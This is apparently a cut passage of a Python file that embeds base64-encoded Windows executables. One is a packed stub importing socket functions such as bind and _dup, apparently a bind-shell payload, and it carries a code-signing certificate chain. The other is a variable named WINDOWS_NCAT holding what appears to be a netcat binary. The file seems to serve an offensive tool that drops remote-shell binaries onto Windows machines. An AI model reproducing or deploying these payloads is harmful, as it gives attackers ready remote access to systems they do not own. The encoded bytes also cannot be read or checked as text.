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""" +# 32bit + +WINDOWS_NCAT = """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